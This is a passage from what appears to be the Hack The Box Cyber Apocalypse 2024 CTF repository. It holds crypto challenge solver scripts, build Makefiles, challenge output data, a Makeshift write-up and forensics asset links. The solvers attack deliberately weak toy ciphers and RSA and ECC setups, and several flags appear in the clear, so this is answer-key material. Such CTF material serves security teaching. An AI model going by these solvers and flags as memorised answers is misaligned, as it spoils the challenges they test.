in range(0, len(enc_flag), 8)] 33 | flag = b'' 34 | 35 | for ct in blocks: 36 | flag += decrypt_block(key, ct) 37 | 38 | return flag 39 | 40 | def pwn(): 41 | key, enc_flag = load_data() 42 | flag = tea_ecb_decrypt(key, enc_flag) 43 | print(flag) 44 | 45 | if __name__ == '__main__': 46 | pwn() -------------------------------------------------------------------------------- /crypto/[Hard] Permuted/htb/secret.py: -------------------------------------------------------------------------------- 1 | a = 839949590738986464 2 | b = 828039274502849303 3 | 4 | FLAG = b'HTB{w3lL_n0T_aLl_gRoUpS_aRe_eQUaL_!!}' 5 | -------------------------------------------------------------------------------- /crypto/[Hard] Permuted/htb/solve.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from Crypto.Util.number import long_to_bytes 3 | 4 | from hashlib import sha256 5 | 6 | from sympy.ntheory.modular import crt 7 | 8 | # DLP found in https://www.researchgate.net/publication/326514386_Cryptanalysis_of_a_Proposal_Based_on_the_Discrete_Logarithm_Problem_Inside_Sn 9 | class Permutation: 10 | def __init__(self, mapping): 11 | self.length = len(mapping) 12 | 13 | assert set(mapping) == set(range(self.length)) # ensure it contains all numbers from 0 to length-1, with no repetitions 14 | self.mapping = list(mapping) 15 | 16 | def __call__(self, *args, **kwargs): 17 | idx, *_ = args 18 | assert idx in range(self.length) 19 | return self.mapping[idx] 20 | 21 | def __mul__(self, other): 22 | ans = [] 23 | 24 | for i in range(self.length): 25 | ans.append(self(other(i))) 26 | 27 | return Permutation(ans) 28 | 29 | def __pow__(self, power, modulo=None): 30 | ans = Permutation.identity(self.length) 31 | ctr = self 32 | 33 | while power > 0: 34 | if power % 2 == 1: 35 | ans *= ctr 36 | ctr *= ctr 37 | power //= 2 38 | 39 | return ans 40 | 41 | def __str__(self): 42 | return str(self.mapping) 43 | 44 | def cycles(self): 45 | # this was added! 46 | cycles = [] 47 | used = set() 48 | 49 | for i in self.mapping: 50 | if i in used: 51 | continue 52 | 53 | curr_cycle = [i] 54 | used.add(i) 55 | 56 | idx = self(i) 57 | while idx not in used: 58 | curr_cycle.append(idx) 59 | used.add(idx) 60 | idx = self(idx) 61 | 62 | cycles.append(curr_cycle) 63 | 64 | return cycles 65 | 66 | def identity(length): 67 | return Permutation(range(length)) 68 | 69 | 70 | 71 | def dlp(g, h): 72 | # g is base 73 | # h is result 74 | g_cycles = g.cycles() 75 | h_cycles = h.cycles() 76 | 77 | print('g cycles:', g_cycles) 78 | print('h cycles:', h_cycles) 79 | 80 | G = [] 81 | H = [] 82 | 83 | for i in range(g.length): 84 | for j, c in enumerate(g_cycles): 85 | if i in c: 86 | G.append((j, c.index(i))) 87 | 88 | for j, c in enumerate(h_cycles): 89 | if i in c: 90 | H.append((j, c.index(i))) 91 | 92 | print('G:', G) 93 | print('H:', H) 94 | 95 | First = [] 96 | Second = [] 97 | 98 | for c in h_cycles: 99 | First.append(c[0]) 100 | Second.append(c[1 % len(c)]) 101 | 102 | print('first:', First) 103 | print('second:', Second) 104 | 105 | D = [] 106 | L = [] 107 | for i in range(len(Second)): 108 | dist = G[Second[i]][1] - G[First[i]][1] 109 | D.append(dist) 110 | L.append(len(h_cycles[i])) 111 | 112 | print('D:', D) 113 | print('L:', L) 114 | 115 | alpha = crt(L, D) 116 | 117 | return int(alpha[0]) 118 | 119 | 120 | # solve! 121 | with open('output.txt') as f: 122 | exec(f.read()) 123 | 124 | g = Permutation(g) 125 | A = Permutation(A) 126 | B = Permutation(B) 127 | 128 | a = dlp(g, A) 129 | 130 | # decrypt 131 | C = B**a 132 | 133 | sec = tuple(C.mapping) 134 | sec = hash(sec) 135 | sec = long_to_bytes(sec) 136 | 137 | hash = sha256() 138 | hash.update(sec) 139 | 140 | key = hash.digest()[16:32] 141 | iv = b"mg'g\xce\x08\xdbYN2\x89\xad\xedlY\xb9" 142 | 143 | cipher = AES.new(key, AES.MODE_CBC, iv) 144 | 145 | decrypted = cipher.decrypt(c) 146 | print('Flag:', decrypted) 147 | 148 | # ~70 seconds 149 | -------------------------------------------------------------------------------- /crypto/[Hard] Tsayaki/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | mkdir -p ../release/crypto_$(name); \ 5 | cp server.py ../release/crypto_$(name); \ 6 | cp tea.py ../htb; 7 | 8 | @cd release; \ 9 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 10 | unzip -l ./crypto_$(name).zip; 11 | 12 | @echo [+] Challenge was built successfully. 13 | else 14 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 15 | endif 16 | 17 | flag: 18 | @echo [+] Flag : $$(cd challenge; python3 -c 'from secret import FLAG; print(FLAG);') 19 | 20 | solver: 21 | @echo [+] Running solver 22 | @echo $$(cd challenge ; python3 ../htb/solver.py) 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @echo [+] Challenge release deleted successfully. -------------------------------------------------------------------------------- /crypto/[Hard] Tsayaki/htb/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import process, remote, xor 2 | from tea import Cipher as TEA 3 | from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b 4 | import os 5 | 6 | HOST = 'localhost' 7 | PORT = 1337 8 | 9 | def recover_iv(): 10 | io = process(['python3', '../challenge/server.py'], level='error') 11 | io.recvuntil(b'message: ') 12 | server_message = bytes.fromhex(io.recvline().decode()) 13 | key = b'\x00'*16 14 | ct = TEA(key).encrypt(server_message) # encrypt with ECB 15 | io.sendlineafter(b'(in hex) : ', ct.hex().encode()) 16 | io.sendlineafter(b'(in hex) : ', key.hex().encode()) 17 | io.recvuntil(b'but ') 18 | enc_server_msg = bytes.fromhex(io.recv(48).decode()) # get CBC ciphertext 19 | dec_msg = decrypt_block(key, enc_server_msg[:8]) 20 | iv = xor(dec_msg[:8], server_message[:8]) 21 | return iv 22 | 23 | 24 | def decrypt_block(key, ct): 25 | m0 = b2l(ct[:4]) 26 | m1 = b2l(ct[4:]) 27 | msk = (1 << 32) - 1 28 | DELTA = 0x9e3779b9 29 | s = 0xc6ef3720 30 | 31 | for i in range(32): 32 | m1 -= ((m0 << 4) + key[2]) ^ (m0 + s) ^ ((m0 >> 5) + key[3]) 33 | m1 &= msk 34 | m0 -= ((m1 << 4) + key[0]) ^ (m1 + s) ^ ((m1 >> 5) + key[1]) 35 | m0 &= msk 36 | s -= DELTA 37 | 38 | m = ((m0 << 32) + m1) & ((1 << 64) - 1) 39 | 40 | return l2b(m) 41 | 42 | # https://www.tayloredge.com/reference/Mathematics/VRAndem.pdf 43 | def get_equivalent_keys(key): 44 | n = l2b(1 << 31) 45 | k0, k1, k2, k3 = [key[i:i+4] for i in range(0, len(key), 4)] 46 | 47 | key0 = k0 + k1 + k2 + k3 48 | key1 = k0 + k1 + xor(k2, n) + xor(k3, n) 49 | key2 = xor(k0, n) + xor(k1, n) + k2 + k3 50 | key3 = xor(k0, n) + xor(k1, n) + xor(k2, n) + xor(k3, n) 51 | 52 | return [key0, key1, key2, key3] 53 | 54 | def solve_task(io, server_message, iv): 55 | key = os.urandom(16) 56 | keys = get_equivalent_keys(key) 57 | ct = TEA(key, iv).encrypt(server_message) 58 | assert all([ct == TEA(k, iv).encrypt(server_message) for k in keys]), 'Something went wrong' 59 | io.sendlineafter(b'(in hex) : ', ct.hex().encode()) 60 | for j in range(4): 61 | io.sendlineafter(b'(in hex) : ', keys[j].hex().encode()) 62 | return True 63 | 64 | def get_flag(iv): 65 | # io = remote(HOST, PORT) 66 | io = process(['python3', '../challenge/server.py'], level='error') 67 | io.recvuntil(b'message: ') 68 | server_msg = bytes.fromhex(io.recvline().decode()) 69 | for i in range(10): 70 | assert solve_task(io, server_msg, iv) 71 | flag = io.recvline().decode() 72 | return flag 73 | 74 | def pwn(): 75 | iv = recover_iv() 76 | flag = get_flag(iv) 77 | print(flag) 78 | 79 | if __name__ == '__main__': 80 | pwn() -------------------------------------------------------------------------------- /crypto/[Hard] Tsayaki/htb/tea.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.Padding import pad 2 | from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b 3 | from enum import Enum 4 | 5 | class Mode(Enum): 6 | ECB = 0x01 7 | CBC = 0x02 8 | 9 | class Cipher: 10 | def __init__(self, key, iv=None): 11 | self.BLOCK_SIZE = 64 12 | self.KEY = [b2l(key[i:i+self.BLOCK_SIZE//16]) for i in range(0, len(key), self.BLOCK_SIZE//16)] 13 | self.DELTA = 0x9e3779b9 14 | self.IV = iv 15 | if self.IV: 16 | self.mode = Mode.CBC 17 | else: 18 | self.mode = Mode.ECB 19 | 20 | def _xor(self, a, b): 21 | return b''.join(bytes([_a ^ _b]) for _a, _b in zip(a, b)) 22 | 23 | def encrypt(self, msg): 24 | msg = pad(msg, self.BLOCK_SIZE//8) 25 | blocks = [msg[i:i+self.BLOCK_SIZE//8] for i in range(0, len(msg), self.BLOCK_SIZE//8)] 26 | 27 | ct = b'' 28 | if self.mode == Mode.ECB: 29 | for pt in blocks: 30 | ct += self.encrypt_block(pt) 31 | elif self.mode == Mode.CBC: 32 | X = self.IV 33 | for pt in blocks: 34 | enc_block = self.encrypt_block(self._xor(X, pt)) 35 | ct += enc_block 36 | X = enc_block 37 | return ct 38 | 39 | def encrypt_block(self, msg): 40 | m0 = b2l(msg[:4]) 41 | m1 = b2l(msg[4:]) 42 | K = self.KEY 43 | msk = (1 << (self.BLOCK_SIZE//2)) - 1 44 | 45 | s = 0 46 | for i in range(32): 47 | s += self.DELTA 48 | m0 += ((m1 << 4) + K[0]) ^ (m1 + s) ^ ((m1 >> 5) + K[1]) 49 | m0 &= msk 50 | m1 += ((m0 << 4) + K[2]) ^ (m0 + s) ^ ((m0 >> 5) + K[3]) 51 | m1 &= msk 52 | 53 | m = ((m0 << (self.BLOCK_SIZE//2)) + m1) & ((1 << self.BLOCK_SIZE) - 1) # m = m0 || m1 54 | 55 | return l2b(m) -------------------------------------------------------------------------------- /crypto/[Insane] ROT128/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | mkdir -p ../release/crypto_$(name); \ 5 | cp server.py ../release/crypto_$(name); 6 | 7 | @cd release; \ 8 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 9 | unzip -l ./crypto_$(name).zip; 10 | 11 | @echo [+] Challenge was built successfully. 12 | else 13 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 14 | endif 15 | 16 | flag: 17 | @echo [+] Flag : $$(cd challenge; python3 -c 'from secret import FLAG; print(FLAG);') 18 | 19 | solver: 20 | @echo [+] Running solver 21 | @echo $$(cd challenge ; sage ../htb/solver.sage) 22 | @find ./ -name "*.sage.py" -type f -delete 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @find . -name "*.sage.py" -type f -delete 29 | @echo [+] Challenge release deleted successfully. -------------------------------------------------------------------------------- /crypto/[Medium] Arranged/htb/solve.sage: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from Crypto.Util.number import long_to_bytes 3 | from hashlib import sha256 4 | 5 | enc_flag = b'V\x1b\xc6&\x04Z\xb0c\xec\x1a\tn\xd9\xa6(\xc1\xe1\xc5I\xf5\x1c\xd3\xa7\xdd\xa0\x84j\x9bob\x9d"\xd8\xf7\x98?^\x9dA{\xde\x08\x8f\x84i\xbf\x1f\xab' 6 | 7 | def decrypt(Q): 8 | secret = Q[0] 9 | 10 | hash = sha256() 11 | hash.update(long_to_bytes(secret)) 12 | 13 | key = hash.digest()[16:32] 14 | iv = b'u\x8fo\x9aK\xc5\x17\xa7>[\x18\xa3\xc5\x11\x9en' 15 | cipher = AES.new(key, AES.MODE_CBC, iv) 16 | 17 | decrypted = cipher.decrypt(enc_flag) 18 | return decrypted 19 | 20 | # first retrieve p 21 | # we know 3 points 22 | # we can eliminate b and get 3 equations, use GCD for p 23 | A = (6174416269259286934151093673164493189253884617479643341333149124572806980379124586263533252636111274525178176274923169261099721987218035121599399265706997, 2456156841357590320251214761807569562271603953403894230401577941817844043774935363309919542532110972731996540328492565967313383895865130190496346350907696) 24 | B = (4226762176873291628054959228555764767094892520498623417484902164747532571129516149589498324130156426781285021938363575037142149243496535991590582169062734, 425803237362195796450773819823046131597391930883675502922975433050925120921590881749610863732987162129269250945941632435026800264517318677407220354869865) 25 | G = (926644437000604217447316655857202297402572559368538978912888106419470011487878351667380679323664062362524967242819810112524880301882054682462685841995367, 4856802955780604241403155772782614224057462426619061437325274365157616489963087648882578621484232159439344263863246191729458550632500259702851115715803253) 26 | 27 | # y^2 = x^3 + 726x + b 28 | # A.y^2 = A.x^3 + 726*A.x + b 29 | # B.y^2 = B.x^3 + 726*B.x + b 30 | # A.y^2 - B.y^2 = A.x^3 + 726*A.x - B.x^3 - 726*B.x 31 | # A.y^2 - B.y^2 - A.x^3 - 726*A.x + B.x^3 + 726*B.x = 0 mod p 32 | # A.y^2 - G.y^2 - A.x^3 - 726*A.x + G.x^3 + 726*G.x = 0 mod p 33 | 34 | x1 = A[1]^2 - B[1]^2 - A[0]^3 - 726*A[0] + B[0]^3 + 726*B[0] 35 | x2 = A[1]^2 - G[1]^2 - A[0]^3 - 726*A[0] + G[0]^3 + 726*G[0] 36 | 37 | p = gcd(x1, x2) 38 | F = GF(p) 39 | b = (A[1]^2 - A[0]^3 - 726*A[0]) % p 40 | 41 | # note that order of G is 11 42 | E = EllipticCurve(F, [726, b]) 43 | G = E(G[0], G[1]) 44 | # print(G.order()) 45 | 46 | # brute force the result 47 | for i in range(1, 12): 48 | P = i*G 49 | msg = decrypt(P) 50 | 51 | if b'HTB{' in msg: 52 | print(msg) 53 | break 54 | -------------------------------------------------------------------------------- /crypto/[Medium] Partial Tenacity/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | 24 | test: clean default flag solver 25 | 26 | clean: 27 | @rm -rf release/* 28 | @rm -rf htb/output.txt 29 | @echo [+] Challenge release deleted successfully. 30 | -------------------------------------------------------------------------------- /crypto/[Medium] Partial Tenacity/htb/output.txt: -------------------------------------------------------------------------------- 1 | n = 118641897764566817417551054135914458085151243893181692085585606712347004549784923154978949512746946759125187896834583143236980760760749398862405478042140850200893707709475167551056980474794729592748211827841494511437980466936302569013868048998752111754493558258605042130232239629213049847684412075111663446003 2 | ct = 7f33a035c6390508cee1d0277f4712bf01a01a46677233f16387fae072d07bdee4f535b0bd66efa4f2475dc8515696cbc4bc2280c20c93726212695d770b0a8295e2bacbd6b59487b329cc36a5516567b948fed368bf02c50a39e6549312dc6badfef84d4e30494e9ef0a47bd97305639c875b16306fcd91146d3d126c1ea476 3 | p = 151441473357136152985216980397525591305875094288738820699069271674022167902643 4 | q = 15624342005774166525024608067426557093567392652723175301615422384508274269305 -------------------------------------------------------------------------------- /crypto/[Medium] Partial Tenacity/htb/solver.py: -------------------------------------------------------------------------------- 1 | from math import sqrt 2 | from Crypto.PublicKey import RSA 3 | from Crypto.Cipher import PKCS1_OAEP 4 | 5 | def load_data(): 6 | with open('output.txt') as f: 7 | n = int(f.readline().split(' = ')[1]) 8 | ct = bytes.fromhex(f.readline().split(' = ')[1]) 9 | hint_p = int(f.readline().split(' = ')[1]) 10 | hint_q = int(f.readline().split(' = ')[1]) 11 | return n, ct, hint_p, hint_q 12 | 13 | def decrypt(p, q, n, ct): 14 | e = 0x10001 15 | d = pow(e, -1, (p-1)*(q-1)) 16 | key = RSA.construct((n, e, d)) 17 | flag = PKCS1_OAEP.new(key).decrypt(ct) 18 | return flag 19 | 20 | def create_masks(primelen): 21 | pmask = ''.join(['1' if i % 2 == 0 else '0' for i in range(primelen)]) 22 | qmask = ''.join(['1' if i % 2 == 1 else '0' for i in range(primelen)]) 23 | return pmask, qmask 24 | 25 | def bruteforce_digit(i, n, known_prime, prime_to_check, hint_prime): 26 | msk = 10**(i+1) 27 | known_prime = 10**i * (hint_prime % 10) + known_prime 28 | for d in range(10): 29 | test_prime = 10**i * d + prime_to_check 30 | if n % msk == known_prime * test_prime % msk: 31 | updated_prime_to_check = test_prime # correct candidate! update the unknown prime 32 | updated_hint_prime = hint_prime // 10 # move on to the next digit 33 | return known_prime, updated_prime_to_check, updated_hint_prime 34 | 35 | def factor(n, p, q, hp, hq, pmask, qmask, prime_len): 36 | for i in range(prime_len): 37 | if pmask[-(i+1)] == '1': 38 | p, q, hp = bruteforce_digit(i, n, p, q, hp) 39 | else: 40 | q, p, hq = bruteforce_digit(i, n, q, p, hq) 41 | 42 | assert n == p * q 43 | 44 | return p, q 45 | 46 | def pwn(): 47 | n, ct, hint_p, hint_q = load_data() 48 | prime_len = len(str(int(sqrt(n)))) 49 | pmask, qmask = create_masks(prime_len) 50 | p, q = factor(n, 0, 0, hint_p, hint_q, pmask, qmask, prime_len) 51 | flag = decrypt(p, q, n, ct) 52 | print(flag) 53 | 54 | if __name__ == '__main__': 55 | pwn() -------------------------------------------------------------------------------- /crypto/[Very Easy] Dynastic/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG)') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | @find . -name "*.sage.py" -type f -delete 24 | 25 | test: clean default flag solver 26 | 27 | clean: 28 | @rm -rf release/* 29 | @rm -rf htb/output.txt 30 | @find . -name "*.sage.py" -type f -delete 31 | @echo [+] Challenge release deleted successfully. 32 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Dynastic/htb/output.txt: -------------------------------------------------------------------------------- 1 | Make sure you wrap the decrypted text with the HTB flag format :-] 2 | DJF_CTA_SWYH_NPDKK_MBZ_QPHTIGPMZY_KRZSQE?!_ZL_CN_PGLIMCU_YU_KJODME_RYGZXL -------------------------------------------------------------------------------- /crypto/[Very Easy] Dynastic/htb/solver.py: -------------------------------------------------------------------------------- 1 | def to_identity_map(a): 2 | return ord(a) - 0x41 3 | 4 | def from_identity_map(a): 5 | return chr(a % 26 + 0x41) 6 | 7 | with open('output.txt') as f: 8 | f.readline() 9 | enc = f.readline() 10 | 11 | flag = '' 12 | for i in range(len(enc)): 13 | ech = enc[i] 14 | if not ech.isalpha(): 15 | m = ech 16 | else: 17 | echi = to_identity_map(ech) 18 | m = from_identity_map(echi - i) 19 | flag += m 20 | 21 | print(f'HTB{{{flag}}}') -------------------------------------------------------------------------------- /crypto/[Very Easy] Makeshift/README.md: -------------------------------------------------------------------------------- 1 | ![img](../../../../../assets/banner.png) 2 | 3 | Makeshift 4 | 5 | ​ 29th Jan 2024 / Document No. D24.102.25 6 | 7 | ​ Challenge Author(s): ir0nstone 8 | 9 | 10 | 11 | # Synopsis 12 | Makeshift is a Very Easy crypto challenge that involves reversing a simple custom "encryption" algorithm. 13 | 14 | # Description: 15 | Weak and starved, you struggle to plod on. Food is a commodity at this stage, but you can’t lose your alertness - to do so would spell death. You realise that to survive you will need a weapon, both to kill and to hunt, but the field is bare of stones. As you drop your body to the floor, something sharp sticks out of the undergrowth and into your thigh. As you grab a hold and pull it out, you realise it’s a long stick; not the finest of weapons, but once sharpened could be the difference between dying of hunger and dying with honour in combat. 16 | 17 | ## Skills Required 18 | - Understanding Python code 19 | 20 | ## Skills Learned 21 | - Undoing programmatic operations 22 | 23 | # Enumeration 24 | We are given the following script: 25 | 26 | ```py 27 | from secret import FLAG 28 | 29 | flag = FLAG[::-1] 30 | new_flag = '' 31 | 32 | for i in range(0, len(flag), 3): 33 | new_flag += flag[i+1] 34 | new_flag += flag[i+2] 35 | new_flag += flag[i] 36 | 37 | print(new_flag) 38 | ``` 39 | 40 | `output.txt` also gives us an encrypted flag: 41 | 42 | ``` 43 | !?}De!e3d_5n_nipaOw_3eTR3bt4{_THB 44 | ``` 45 | 46 | The flag is encrypted in a very simple way: 47 | * First it is reversed 48 | * It is then split into groups of three characters, which all have the same thing done to it: 49 | * The second character is placed first 50 | * The third character is placed second 51 | * The first character is placed third 52 | * In essence, every sequence of characters ABC is changed to BCA 53 | 54 | # Solution 55 | In order to reverse this, we have to do the same operations in the opposite order. So, given sets 56 | of 3 BCA, we have to convert it back to ABC. We can do this by making sure that: 57 | 58 | * The third character is placed first 59 | * The first character is placed second 60 | * The second character is placed third 61 | 62 | After that, we simple have to reverse it. 63 | 64 | ```python 65 | enc_flag = r'!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB' 66 | 67 | new_flag = '' 68 | 69 | for i in range(0, len(enc_flag), 3): 70 | new_flag += enc_flag[i+2] 71 | new_flag += enc_flag[i] 72 | new_flag += enc_flag[i+1] 73 | 74 | flag = new_flag[::-1] 75 | 76 | print(flag) 77 | ``` 78 | 79 | And we get the flag! 80 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Makeshift/htb/solve.py: -------------------------------------------------------------------------------- 1 | enc_flag = r'!?}De!e3d_5n_nipaOw_3eTR3bt4{_THB' 2 | 3 | new_flag = '' 4 | 5 | for i in range(0, len(enc_flag), 3): 6 | new_flag += enc_flag[i+2] 7 | new_flag += enc_flag[i] 8 | new_flag += enc_flag[i+1] 9 | 10 | flag = new_flag[::-1] 11 | 12 | print(flag) 13 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Primary Knowledge/Makefile: -------------------------------------------------------------------------------- 1 | default: 2 | ifdef name 3 | @cd challenge; \ 4 | python3 source.py; \ 5 | mkdir crypto_$(name); \ 6 | cp source.py output.txt ./crypto_$(name); \ 7 | cp output.txt ../htb/; \ 8 | mv ./crypto_$(name) ../release/; 9 | 10 | @cd release; \ 11 | zip -9 -r ./crypto_$(name).zip ./crypto_$(name); \ 12 | unzip -l ./crypto_$(name).zip; 13 | 14 | @echo [+] Challenge was built successfully. 15 | else 16 | @echo [-] Please define the challenge name. For example, \"make name=cool_chall_name\" 17 | endif 18 | 19 | flag: 20 | @echo [+] Flag : $$(cd challenge; python3 -c 'import secret; print(secret.FLAG.decode())') 21 | solver: 22 | @echo [+] PoC : $$(cd htb ; python3 solver.py) 23 | @find . -name "*.sage.py" -type f -delete 24 | 25 | test: clean default flag solver 26 | 27 | clean: 28 | @rm -rf release/* 29 | @rm -rf htb/output.txt 30 | @find . -name "*.sage.py" -type f -delete 31 | @echo [+] Challenge release deleted successfully. 32 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Primary Knowledge/htb/output.txt: -------------------------------------------------------------------------------- 1 | n = 144595784022187052238125262458232959109987136704231245881870735843030914418780422519197073054193003090872912033596512666042758783502695953159051463566278382720140120749528617388336646147072604310690631290350467553484062369903150007357049541933018919332888376075574412714397536728967816658337874664379646535347 2 | e = 65537 3 | c = 15114190905253542247495696649766224943647565245575793033722173362381895081574269185793855569028304967185492350704248662115269163914175084627211079781200695659317523835901228170250632843476020488370822347715086086989906717932813405479321939826364601353394090531331666739056025477042690259429336665430591623215 4 | -------------------------------------------------------------------------------- /crypto/[Very Easy] Primary Knowledge/htb/solver.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import isPrime, long_to_bytes 2 | 3 | with open('output.txt') as f: 4 | exec(f.read()) 5 | 6 | assert isPrime(n) 7 | 8 | phi = n-1 9 | d = pow(e, -1, phi) 10 | m = pow(c, d, n) 11 | print(long_to_bytes(m).decode()) -------------------------------------------------------------------------------- /forensics/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/.gitkeep -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/banner.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/htb.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/writeup1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/writeup1.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/writeup2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/writeup2.png -------------------------------------------------------------------------------- /forensics/[Easy] Fake Boost/assets/writeup3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Fake Boost/assets/writeup3.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/banner.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/htb.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q1.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q2.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q3.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q4.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q5.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q6.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q7.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q8.png -------------------------------------------------------------------------------- /forensics/[Easy] Persue The Tracks/assets/images/q9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/forensics/[Easy] Persue The Tracks/assets/images/q9.png -------------------------------------------------------------------------------- /forensics/[Hard] Confinement/assets/banner.png: -------------------------------------------------------------------------------- 